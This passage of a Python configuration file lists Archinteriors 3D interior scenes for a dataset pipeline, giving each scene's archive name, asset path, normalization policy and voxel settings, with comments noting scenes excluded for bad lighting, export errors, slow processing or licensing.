scenes.append({"name": "ai_006_004", "archive_file": "AI6_004.rar", "asset_file": "004", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_006_005", "archive_file": "AI6_005.rar", "asset_file": "005", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_006", "archive_file": "AI6_006.rar", "asset_file": "006", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_007", "archive_file": "AI6_007.rar", "asset_file": "007", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_008", "archive_file": "AI6_008.rar", "asset_file": "008", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_009", "archive_file": "AI6_009.rar", "asset_file": "009", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_006_010", "archive_file": "AI6_010.rar", "asset_file": "010", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_001", "archive_file": "AI7_01.RAR", "asset_file": "01", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_002", "archive_file": "AI7_02.RAR", "asset_file": "02", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_007_003", "archive_file": "AI7_03.RAR", "asset_file": "03", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_004", "archive_file": "AI7_04.RAR", "asset_file": "04", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_005", "archive_file": "AI7_05.RAR", "asset_file": "05", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_006", "archive_file": "AI7_06.RAR", "asset_file": "06", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_007", "archive_file": "AI7_07.RAR", "asset_file": "07", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_008", "archive_file": "AI7_08.RAR", "asset_file": "08", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_009", "archive_file": "AI7_09.RAR", "asset_file": "09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_007_010", "archive_file": "AI7_10.RAR", "asset_file": "10", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_001", "archive_file": "AI8_01.rar", "asset_file": "01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_002", "archive_file": "AI8_02.rar", "asset_file": "02", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_003", "archive_file": "AI8_03.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_004", "archive_file": "AI8_04.rar", "asset_file": "04", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_005", "archive_file": "AI8_05.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_006", "archive_file": "AI8_06.rar", "asset_file": "06", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_007", "archive_file": "AI8_07.rar", "asset_file": "07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_008", "archive_file": "AI8_08.rar", "asset_file": "08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_009", "archive_file": "AI8_09.rar", "asset_file": "09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_010", "archive_file": "AI8_10.rar", "asset_file": "010", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_001", "archive_file": "AI9_SCENE 01.rar", "asset_file": "SCENE 01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_002", "archive_file": "AI9_SCENE 02.rar", "asset_file": "SCENE 02", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_003", "archive_file": "AI9_SCENE 03.rar", "asset_file": "SCENE 03", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_004", "archive_file": "AI9_SCENE 04.rar", "asset_file": "SCENE 04", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_005", "archive_file": "AI9_SCENE 05.rar", "asset_file": "SCENE 05", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_006", "archive_file": "AI9_SCENE 06.rar", "asset_file": "SCENE 06", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_007", "archive_file": "AI9_SCENE 07.rar", "asset_file": "SCENE 07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_008", "archive_file": "AI9_SCENE 08.rar", "asset_file": "SCENE 08", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_009", "archive_file": "AI9_SCENE 09.rar", "asset_file": "SCENE 09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generates error during export: vertex coordinate too big adjust object-scale
# scenes.append({"name": "ai_009_010", "archive_file": "AI9_SCENE 10.rar", "asset_file": "SCENE 10", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 10-19
#
scenes.append({"name": "ai_010_001", "archive_file": "AI10_001.RAR", "asset_file": "001", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_002", "archive_file": "AI10_002.RAR", "asset_file": "002", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_003", "archive_file": "AI10_003.RAR", "asset_file": "003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_004", "archive_file": "AI10_004.RAR", "asset_file": "004", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_005", "archive_file": "AI10_005.RAR", "asset_file": "005", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_006", "archive_file": "AI10_006.RAR", "asset_file": "006", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_007", "archive_file": "AI10_007.RAR", "asset_file": "007", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_008", "archive_file": "AI10_008.RAR", "asset_file": "008", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_009", "archive_file": "AI10_009.RAR", "asset_file": "009", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_010_010", "archive_file": "AI10_010.RAR", "asset_file": "010", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_001", "archive_file": "AI11_01.rar", "asset_file": "01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generates error during export: vertex coordinate too big adjust object-scale
# scenes.append({"name": "ai_011_002", "archive_file": "AI11_02.rar", "asset_file": "02", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_003", "archive_file": "AI11_03.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_004", "archive_file": "AI11_04.rar", "asset_file": "04", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_005", "archive_file": "AI11_05.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_006", "archive_file": "AI11_06.rar", "asset_file": "06", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_007", "archive_file": "AI11_07.rar", "asset_file": "07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_008", "archive_file": "AI11_08.rar", "asset_file": "08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_009", "archive_file": "AI11_09.rar", "asset_file": "09", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_010", "archive_file": "AI11_10.rar", "asset_file": "10", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_001", "archive_file": "archinteriors_vol_012_scene_001.rar", "asset_file": os.path.join("ArchInteriors_12_01", "ArchInteriors_12_01"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_002", "archive_file": "archinteriors_vol_012_scene_002.rar", "asset_file": os.path.join("ArchInteriors_12_02", "ArchInteriors_12_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_003", "archive_file": "archinteriors_vol_012_scene_003.rar", "asset_file": os.path.join("ArchInteriors_12_03", "ArchInteriors_12_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_004", "archive_file": "archinteriors_vol_012_scene_004.rar", "asset_file": os.path.join("ArchInteriors_12_04", "ArchInteriors_12_04"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_005", "archive_file": "archinteriors_vol_012_scene_005.rar", "asset_file": os.path.join("ArchInteriors_12_05", "ArchInteriors_12_05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_006", "archive_file": "archinteriors_vol_012_scene_006.rar", "asset_file": os.path.join("ArchInteriors_12_06", "ArchInteriors_12_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_007", "archive_file": "archinteriors_vol_012_scene_007.rar", "asset_file": os.path.join("ArchInteriors_12_07", "ArchInteriors_12_07"), "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_008", "archive_file": "archinteriors_vol_012_scene_008.rar", "asset_file": os.path.join("ArchInteriors_12_08", "ArchInteriors_12_08"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_009", "archive_file": "archinteriors_vol_012_scene_009.rar", "asset_file": os.path.join("ArchInteriors_12_09", "ArchInteriors_12_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_010", "archive_file": "archinteriors_vol_012_scene_010.rar", "asset_file": os.path.join("ArchInteriors_12_10", "ArchInteriors_12_10"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_001", "archive_file": "archinteriors_vol13_01.rar", "asset_file": os.path.join("archinteriors_vol13_01", "001"), "normalization_policy": "v2", "scene_extent_meters": 500.0, "voxel_extent_meters": 1.0})
scenes.append({"name": "ai_013_002", "archive_file": "archinteriors_vol13_02.rar", "asset_file": os.path.join("archinteriors_vol13_02", "002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_003", "archive_file": "archinteriors_vol13_03.rar", "asset_file": os.path.join("archinteriors_vol13_03", "003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_004", "archive_file": "archinteriors_vol13_04.rar", "asset_file": os.path.join("archinteriors_vol13_04", "004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_005", "archive_file": "archinteriors_vol13_05.rar", "asset_file": os.path.join("archinteriors_vol13_05", "005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_006", "archive_file": "archinteriors_vol13_06.rar", "asset_file": os.path.join("archinteriors_vol13_06", "006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_007", "archive_file": "archinteriors_vol13_07.rar", "asset_file": os.path.join("archinteriors_vol13_07", "007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_008", "archive_file": "archinteriors_vol13_08.rar", "asset_file": os.path.join("archinteriors_vol13_08", "008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_009", "archive_file": "archinteriors_vol13_09.rar", "asset_file": os.path.join("archinteriors_vol13_09", "009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_010", "archive_file": "archinteriors_vol13_10.rar", "asset_file": os.path.join("archinteriors_vol13_10", "010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_001", "archive_file": "archinteriors_vol_014_scene_001.rar", "asset_file": os.path.join("ArchInteriors_14_01", "Archinteriors_14_01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_002", "archive_file": "archinteriors_vol_014_scene_002.rar", "asset_file": os.path.join("ArchInteriors_14_02", "Archinteriors_14_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_003", "archive_file": "archinteriors_vol_014_scene_003.rar", "asset_file": os.path.join("ArchInteriors_14_03", "Archinteriors_14_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_004", "archive_file": "archinteriors_vol_014_scene_004.rar", "asset_file": os.path.join("ArchInteriors_14_04", "Archinteriors_14_04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_005", "archive_file": "archinteriors_vol_014_scene_005.rar", "asset_file": os.path.join("ArchInteriors_14_05", "Archinteriors_14_05"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_006", "archive_file": "archinteriors_vol_014_scene_006.rar", "asset_file": os.path.join("ArchInteriors_14_06", "Archinteriors_14_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_014_007", "archive_file": "archinteriors_vol_014_scene_007.rar", "asset_file": os.path.join("ArchInteriors_14_07", "Archinteriors_14_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_008", "archive_file": "archinteriors_vol_014_scene_008.rar", "asset_file": os.path.join("ArchInteriors_14_08", "Archinteriors_14_08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_009", "archive_file": "archinteriors_vol_014_scene_009.rar", "asset_file": os.path.join("ArchInteriors_14_09", "Archinteriors_14_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_010", "archive_file": "archinteriors_vol_014_scene_010.rar", "asset_file": os.path.join("ArchInteriors_14_10", "Archinteriors_14_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_001", "archive_file": "archinteriors_vol_015_scene_001.rar", "asset_file": os.path.join("001", "archinteriors15_1"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_002", "archive_file": "archinteriors_vol_015_scene_002.rar", "asset_file": os.path.join("002", "archinteriors15_2"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_003", "archive_file": "archinteriors_vol_015_scene_003.rar", "asset_file": os.path.join("003", "archinteriors15_3"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_004", "archive_file": "archinteriors_vol_015_scene_004.rar", "asset_file": os.path.join("004", "archinteriors15_4"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_005", "archive_file": "archinteriors_vol_015_scene_005.rar", "asset_file": os.path.join("005", "archinteriors15_5"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_006", "archive_file": "archinteriors_vol_015_scene_006.rar", "asset_file": os.path.join("006", "archinteriors15_6"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_007", "archive_file": "archinteriors_vol_015_scene_007.rar", "asset_file": os.path.join("007", "archinteriors15_7"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_008", "archive_file": "archinteriors_vol_015_scene_008.rar", "asset_file": os.path.join("008", "archinteriors15_8"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_009", "archive_file": "archinteriors_vol_015_scene_009.rar", "asset_file": os.path.join("009", "archinteriors15_9"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_010", "archive_file": "archinteriors_vol_015_scene_010.rar", "asset_file": os.path.join("010", "archinteriors15_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_001", "archive_file": "archinteriors_vol_016_scene_001.rar", "asset_file": os.path.join("01", "archinteriors16_1"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_002", "archive_file": "archinteriors_vol_016_scene_002.rar", "asset_file": os.path.join("02", "archinteriors16_2"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_003", "archive_file": "archinteriors_vol_016_scene_003.rar", "asset_file": os.path.join("03", "archinteriors_16_3"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_004", "archive_file": "archinteriors_vol_016_scene_004.rar", "asset_file": os.path.join("04", "archinteriors_16_4"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_005", "archive_file": "archinteriors_vol_016_scene_005.rar", "asset_file": os.path.join("05", "archinteriors_15_5"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_006", "archive_file": "archinteriors_vol_016_scene_006.rar", "asset_file": os.path.join("06", "archinteriors_16_6"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_007", "archive_file": "archinteriors_vol_016_scene_007.rar", "asset_file": os.path.join("07", "archinteriors_16_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_008", "archive_file": "archinteriors_vol_016_scene_008.rar", "asset_file": os.path.join("08", "archinteriors_16_08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_009", "archive_file": "archinteriors_vol_016_scene_009.rar", "asset_file": os.path.join("09", "archinteriors_16_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_010", "archive_file": "archinteriors_vol_016_scene_010.rar", "asset_file": os.path.join("10", "archinteriors_16_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_001", "archive_file": "archinteriors_vol_017_scene_001.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_001", "Archinteriors_17_01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_002", "archive_file": "archinteriors_vol_017_scene_002.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_002", "Archinteriors_17_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_003", "archive_file": "archinteriors_vol_017_scene_003.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_003", "Archinteriors_17_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_004", "archive_file": "archinteriors_vol_017_scene_004.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_004", "Archinteriors_17_04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_005", "archive_file": "archinteriors_vol_017_scene_005.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_005", "Archinteriors_17_05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_006", "archive_file": "archinteriors_vol_017_scene_006.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_006", "Archinteriors_17_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_007", "archive_file": "archinteriors_vol_017_scene_007.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_007", "archinteriors17_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_008", "archive_file": "archinteriors_vol_017_scene_008.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_008", "archinteriors17_08"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_009", "archive_file": "archinteriors_vol_017_scene_009.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_009", "archinteriors17_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_010", "archive_file": "archinteriors_vol_017_scene_010.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_010", "archinteriors17_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_001", "archive_file": "Archinteriors_vol_18_001.rar", "asset_file": os.path.join("001", "001"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_002", "archive_file": "Archinteriors_vol_18_002.rar", "asset_file": os.path.join("002", "002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_003", "archive_file": "Archinteriors_vol_18_003.rar", "asset_file": "Archinteriors_vol_18_003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_004", "archive_file": "Archinteriors_vol_18_004.rar", "asset_file": os.path.join("004", "004"), "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_005", "archive_file": "Archinteriors_vol_18_005.rar", "asset_file": os.path.join("005", "005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_006", "archive_file": "Archinteriors_vol_18_006.rar", "asset_file": os.path.join("006", "006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_007", "archive_file": "Archinteriors_vol_18_007.rar", "asset_file": os.path.join("007", "007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_008", "archive_file": "Archinteriors_vol_18_008.rar", "asset_file": os.path.join("008", "008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_009", "archive_file": "Archinteriors_vol_18_009.rar", "asset_file": os.path.join("009", "009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_010", "archive_file": "Archinteriors_vol_18_010.rar", "asset_file": os.path.join("010", "010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_001", "archive_file": "Archinteriors_19_001.rar", "asset_file": os.path.join("001", "AI19_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_002", "archive_file": "Archinteriors_19_002.rar", "asset_file": os.path.join("002", "AI19_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_003", "archive_file": "Archinteriors_19_003.rar", "asset_file": os.path.join("003", "AI19_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_004", "archive_file": "Archinteriors_19_004.rar", "asset_file": os.path.join("004", "AI19_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_019_005", "archive_file": "Archinteriors_19_005.rar", "asset_file": os.path.join("005", "AI19_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_006", "archive_file": "Archinteriors_19_006.rar", "asset_file": os.path.join("006", "AI19_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_007", "archive_file": "Archinteriors_19_007.rar", "asset_file": os.path.join("007", "AI19_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_008", "archive_file": "Archinteriors_19_008.rar", "asset_file": os.path.join("008", "AI19_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_009", "archive_file": "Archinteriors_19_009.rar", "asset_file": os.path.join("009", "AI19_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_019_010", "archive_file": "Archinteriors_19_010.rar", "asset_file": os.path.join("010", "AI19_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 20-29
#
# Archinteriors volume 20 is not distributed under the "Royalty Free Licence - All Extended Uses" license, so we exclude it
scenes.append({"name": "ai_021_001", "archive_file": "Archinteriors_21_01.rar", "asset_file": os.path.join("01", "01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_002", "archive_file": "Archinteriors_21_02.rar", "asset_file": os.path.join("02", "02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_003", "archive_file": "Archinteriors_21_03.rar", "asset_file": os.path.join("03", "03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_021_004", "archive_file": "Archinteriors_21_04.rar", "asset_file": os.path.join("04", "04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_021_005", "archive_file": "Archinteriors_21_05.rar", "asset_file": os.path.join("05", "05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
